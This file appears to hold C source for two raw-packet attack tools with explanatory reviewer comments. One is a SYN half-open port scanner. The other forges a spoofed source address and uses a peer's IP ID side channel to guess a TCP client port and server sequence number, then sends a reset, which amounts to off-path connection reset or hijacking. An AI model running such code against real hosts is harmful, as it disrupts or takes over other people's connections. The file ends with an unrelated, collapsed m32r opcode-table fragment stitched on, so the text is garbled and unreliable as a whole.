/*
 * Entry point: sends a TCP SYN per loop iteration and reports any SYN-ACK
 * that comes back, answering each with a RST so no connection is left
 * half-open.  All raw-packet work is done by project helpers (usage,
 * if_menu, str_to_ip, ARPRequest, ARPReply, createSocket, filterDatalink,
 * SYN, RST, recvlayers, findlayer, printlayers, rmlayers, closeDatalink,
 * kbhit) whose contracts are not visible in this file.
 *
 * argv[1]  local IP (parsed by str_to_ip)
 * argv[2]  destination IP
 * argv[3]  port passed as both port arguments to createSocket (atoi, unchecked)
 * argv[4]  eport: upper bound for ts.hostport in the send loop (atoi, unchecked)
 * argv[5]  gateway IP (ARP target)
 *
 * Exit status: 1 on usage error, failed interface selection or unanswered
 * ARP; 0 when the loop is left.  From a monitoring point of view this is
 * the SYN / SYN-ACK / RST pattern half-open scan signatures key on.
 */
int main(int argc, char **argv)
{
    struct layer *head, *tcp;
    struct TCPSocket ts;
    struct MAC imac, dmac;
    uint32_t ip, dip, gip;
    uint16_t eport;
    int n;

    if (argc < 6)
        usage(*argv);           /* presumably does not return -- TODO confirm */
    if (if_menu(&imac) < 0)
        exit(1);
    str_to_ip(argv[1], &ip);
    str_to_ip(argv[2], &dip);
    str_to_ip(argv[5], &gip);
    /* Resolve the gateway's MAC into dmac; the last argument (5) looks like
     * a retry/timeout count -- verify against ARPRequest's definition. */
    if (ARPRequest(&imac, &dmac, ip, gip, 5) < 0) {
        fprintf(stderr, "error: no route to host.\n");
        exit(1);
    }
    ARPReply(&imac, ip, &dmac, gip);
    eport = atoi(argv[4]);      /* non-numeric input silently becomes 0 (no send loop) */
    createSocket(&ts, &imac, &dmac, ip, dip, atoi(argv[3]), atoi(argv[3]));
    filterDatalink("tcp");      /* capture filter: only TCP frames reach recvlayers */
    head = NULL;
    /* Loop until kbhit() reports a key press (name-based assumption -- confirm).
     * ts.hostport is post-incremented every iteration; a SYN is sent only
     * while its old value is still below eport, afterwards the loop just
     * drains captured packets. */
    while (!kbhit()) {
        if (ts.hostport++ < eport)
            SYN(&ts);
        if ((head = recvlayers(&n)) == NULL)
            continue;
        if ((tcp = findlayer(head, LT_TCP)) != NULL) {
            struct tcphdr *t;
            t = (xtcp)tcp->proto;   /* xtcp: project typedef for struct tcphdr * -- assumed */
            /* Only the SYN and ACK flag bits are inspected: nothing checks
             * that the packet's addresses or ports match the probe just
             * sent, so any SYN-ACK seen on the link is reported. */
            if (((t->th_flags & TH_SYN) == TH_SYN) && ((t->th_flags & TH_ACK) == TH_ACK)) {
                printf("recv: SYN-ACK from port %d\n", ntohs(t->th_sport));
                printlayers(tcp);
                RST(&ts);
            }
        }
        rmlayers(head);         /* release the parsed packet on every path */
    }
    closeDatalink();
    exit(0);
}
/*
 * Entry point: sends spoofed-source TCP segments from spoof_ip towards
 * server_ip and, between sends, reads the IP ID field from ICMP echo
 * replies (echo_get_id) to see whether the probed host emitted a packet in
 * response.  Two capture handles are opened on the same interface: dl for
 * the TCP traffic and icmp_dl with a BPF filter restricted to ICMP type 0
 * (echo reply) exchanged between this host and the two peers.  Everything
 * that touches the wire (if_openbyname, ARPRequest, createSocket,
 * filterDatalink, SYN, ACK, RST, echo_get_id, closeDatalink) is a project
 * helper whose contract is not visible here.
 *
 * argv[1]  capture interface name        argv[6]  start_port (atoi)
 * argv[2]  real_ip (this host)           argv[7]  end_port   (atoi)
 * argv[3]  gw_ip (parsed, never used)    argv[8]  server_port (atoi)
 * argv[4]  spoof_ip                      argv[9]  optional serv_seq (strtoul)
 * argv[5]  server_ip
 *
 * Exit status: 1 if a capture handle cannot be opened; otherwise the
 * program exits 0 from one of several exit() calls or the final return.
 * Defensive context: the traffic relies on forged source addresses and on
 * a predictable IP ID counter at the peer; ingress/egress source-address
 * filtering (BCP 38) and randomised IP IDs are the usual countermeasures,
 * and the ICMP echo bursts interleaved with spoofed TCP are observable.
 *
 * NOTE(review): several reads happen before assignment -- dly_serv is
 * printed and added to dly without ever being set, and guess_port is
 * copied from start_port before start_port is parsed from argv[6]; both
 * are undefined behaviour in C.  proto and client_ip are declared but
 * never used.
 */
int main(int argc, char **argv)
{
    struct layer *proto;
    struct MAC localmac, gwmac, cli_mac;
    uint32_t real_ip, spoof_ip, gw_ip, client_ip, server_ip, dly, dly_serv;
    struct TCPSocket ts;
    struct datalink icmp_dl, dl;
    uint16_t start_port, end_port, server_port, ip_id_a, ip_id_b, ip_id_d;
    unsigned long i;
    unsigned short guess_port, min_delta = -1;   /* -1 converts to USHRT_MAX: "no minimum yet" */
    unsigned long guess_serv_seq, serv_seq = 0;
    uint32_t start_guess, end_guess;
    int guess_inc;
    char icmp_filter[256];

    if (argc < 9)
        usage(*argv);           /* presumably does not return -- TODO confirm */
    /* Optional 10th argument: a known server sequence number.  strtoul with
     * a NULL end pointer only catches ERANGE; trailing garbage is accepted. */
    if (argc >= 10) {
        errno = 0;
        serv_seq = strtoul(argv[9], NULL, 10);
        if (errno)
            serv_seq = 0;
    }
    srand(time(NULL));          /* rand() is not used in this function; presumably by a helper */
    memset(&dl, 0, sizeof(dl));
    if (if_openbyname(&dl, argv[1]) < 0) {
        fprintf(stderr, "open_link_byname failed\n");
        return 1;
    }
    memset(&icmp_dl, 0, sizeof(dl));    /* same struct type as icmp_dl, so the size matches */
    if (if_openbyname(&icmp_dl, argv[1]) < 0) {
        fprintf(stderr, "open_link_byname failed\n");
        return 1;               /* dl is left open on this path */
    }
    guess_port = start_port;    /* NOTE(review): start_port is not assigned until below */
    str_to_ip(argv[2], &real_ip);
    str_to_ip(argv[3], &gw_ip);
    str_to_ip(argv[4], &spoof_ip);
    str_to_ip(argv[5], &server_ip);
    memcpy(&localmac.mac, dl.dl_mac, 6);
    /* Echo replies only, in either direction between this host and each peer. */
    snprintf(icmp_filter, sizeof(icmp_filter),
             "icmp and icmp[0] = 0 and "
             "((src %s and dst %s) or (src %s and dst %s))",
             argv[4], argv[2], argv[5], argv[2]);
    filterDatalink(&icmp_dl, icmp_filter);
    /* Ethernet links need the next-hop MACs; both lookups use the same
     * error text even though the second one targets spoof_ip. */
    if (dl.dl_pcap->linktype == DLT_EN10MB) {
        if (ARPRequest(&dl, &localmac, &gwmac, real_ip, server_ip, 5) < 0) {
            fprintf(stderr, "lan gateway did not reply arp\n");
            exit(1);
        }
        if (ARPRequest(&dl, &localmac, &cli_mac, real_ip, spoof_ip, 5) < 0) {
            fprintf(stderr, "lan gateway did not reply arp\n");
            exit(1);
        }
    }
    start_port = atoi(argv[6]); /* unchecked conversions; bad input becomes 0 */
    end_port = atoi(argv[7]);
    server_port = atoi(argv[8]);
    createSocket(&ts, &localmac, &gwmac, spoof_ip, server_ip, start_port, server_port);
    ts.rcvwin = 0;
    ip_id_a = ip_id_b = ip_id_d = 0;
    /* Baseline IP ID samples.  Both calls write the delay into dly; dly_serv
     * is never assigned, so the first printf reads an indeterminate value. */
    echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, server_ip, &dly, &ip_id_a);
    printf("delay to server= %lu\n", dly_serv);
    echo_get_id(&icmp_dl, &localmac, &cli_mac, real_ip, spoof_ip, &dly, &ip_id_a);
    printf("delay = %lu\n", dly);
    /* Phase 1: one SYN per port in [start_port, end_port]; after each send,
     * re-sample the peer's IP ID and record the port with the smallest
     * increase.  A zero delta is taken as a definitive answer and exits. */
    for (i = start_port; i <= end_port; i++) {
        SYN(&ts, &dl);
        usleep((dly + dly_serv));   /* dly_serv uninitialised here as well */
        echo_get_id(&icmp_dl, &localmac, &cli_mac, real_ip, spoof_ip, &dly, &ip_id_b);
        ip_id_d = ip_id_b - ip_id_a;    /* uint16_t arithmetic: wraps modulo 2^16 */
        ip_id_a = ip_id_b;
        if (ip_id_d < min_delta) {
            min_delta = ip_id_d;
            guess_port = i;
        }
        printf("for port %d ip_id delta = %x\n", ts.port, ip_id_d);
        if (ip_id_d == 0) {
            printf(" the client port is: %d\n", ts.port);
            exit(0);            /* capture handles are not closed on this path */
        }
        ts.port++;
        ts.seq++;
    }
    printf("guessed port is %d\n", guess_port);
    /* Re-point the socket at the server using the port chosen above. */
    ts.ip = server_ip;
    ts.port = server_port;
    ts.hostip = spoof_ip;
    ts.hostport = guess_port;
    printf("finding serv.seq using 16k window\n");
    min_delta = -1;             /* reset to USHRT_MAX for the next search */
    /* Phase 2a: a sequence number was supplied, so only compare the IP ID
     * delta for serv_seq+65536 and serv_seq, print both, and stop.  Note the
     * two printf labels are swapped relative to the ts.seq values sent. */
    if (serv_seq != 0) {
        ts.seq = serv_seq + 65536;
        ts.gatewaymac = cli_mac;
        echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_a);
        ts.ack = 0;
        ACK(&ts, &dl);
        //ts.ack = 2<<30;
        //ACK(&ts,&dl);
        echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_b);
        ip_id_d = ip_id_b - ip_id_a;
        printf("for seq %lu delta = %d\n", serv_seq, ip_id_d);
        ts.seq = serv_seq;
        echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_a);
        ts.ack = 0;
        ACK(&ts, &dl);
        //ts.ack = 2<<30;
        //ACK(&ts,&dl);
        echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_b);
        ip_id_d = ip_id_b - ip_id_a;
        printf("for seq %lu delta = %d\n", serv_seq + 65536, ip_id_d);
        closeDatalink(&dl);
        closeDatalink(&icmp_dl);
        exit(0);
    }
    /* Phase 2b: walk candidate sequence numbers downward from 0xffffffff in
     * steps of 16384, sampling the IP ID after each ACK. */
    ip_id_a = ip_id_b = ip_id_d = 0;
    ts.gatewaymac = cli_mac;
    echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_a);
    start_guess = 0xffffffff;
    end_guess = 16385;
    guess_inc = -16384;
    /* NOTE(review): abs() never yields a negative value, so this condition
     * is always true and the loop can only end via the exit(0) below; i is
     * unsigned long, so adding the negative int wraps rather than stopping
     * at end_guess. */
    for (i = start_guess; abs(end_guess - i) >= 0; i += guess_inc) {
        ts.ack = 0;
        ts.seq = i;
        ACK(&ts, &dl);
        //ts.ack = 2<<30; //ts.seq=i; ACK(&ts,&dl);
        /* NOTE(review): in the collapsed source it is unclear whether the
         * trailing ACK on the line above was live or commented out; it is
         * kept as comment text here, matching the serv_seq branch. */
        echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_b);
        ip_id_d = ip_id_b - ip_id_a;
        ip_id_a = ip_id_b;
        if (ip_id_d < min_delta) {
            min_delta = ip_id_d;
            guess_serv_seq = i;
            /* A delta of exactly 1 is treated as conclusive. */
            if (min_delta == 1) {
                printf("for seq %lu ip_id delta = %x\n", ts.seq, ip_id_d);
                RST(&ts, &dl);
                exit(0);        /* capture handles are not closed on this path */
            }
        }
        printf("for seq %lu ip_id delta = %x\n", ts.seq, ip_id_d);
    }
    printf("guessed sequence = %lu\n", guess_serv_seq);
    ts.seq = guess_serv_seq;
    RST(&ts, &dl);
    closeDatalink(&dl);
    closeDatalink(&icmp_dl);
    return 0;
}
/* f-op1.number.f-r1.dr.f-op2.number.f-r2.src2.f-uimm16.number. */ /* 31 */ { 32, 32, 0xf0f0ffff }, }; #define A(a) (1 << CGEN_CAT3 (CGEN_INSN,_,a)) #define SYN(n) (& syntax_table[n]) #define FMT(n) (& format_table[n]) const CGEN_INSN m32r_cgen_insn_table_entries[MAX_INSNS] = { /* null first entry, end of all hash chains */ { { 0 }, 0 }, /* add $dr,$sr */ { { 1, 1, 1, 1 }, "add", "add", SYN (0), FMT (0), 0xa0, { 2, 0|A(PARALLEL), { (1<<MACH_M32R) } } }, /* add3 $dr,$sr,#$slo16 */ { { 1, 1, 1, 1 }, "add3", "add3", SYN (1), FMT (1), 0x80a00000, { 2, 0, { (1<<MACH_M32R) } } }, /* add3 $dr,$sr,$slo16 */ { { 1, 1, 1, 1 }, "add3.a", "add3", SYN (2), FMT (1), 0x80a00000, { 2, 0|A(ALIAS), { (1<<MACH_M32R) } } }, /* and $dr,$sr */